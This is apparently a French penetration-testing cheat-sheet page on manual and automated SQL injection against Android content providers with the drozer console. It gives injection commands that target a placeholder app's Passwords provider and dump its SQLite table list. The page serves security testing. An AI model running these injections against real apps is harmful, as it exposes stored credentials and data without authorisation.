Injections SQL (Android)
Manuelle dans content provider
Dรฉtection
dz> run app.provider.query content://com.example.targetapp.DBContentProvider/Passwords/ --selection "'"
et
dz> run app.provider.query content://com.example.targetapp.DBContentProvider/Passwords/ --projection "'"
Exploitation
dz> run app.provider.query content://com.example.targetapp.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
Automatique
dz> run scanner.provider.injection -a com.example.targetapp
Derniรจre mise ร jour
Cet article vous a-t-il รฉtรฉ utile ?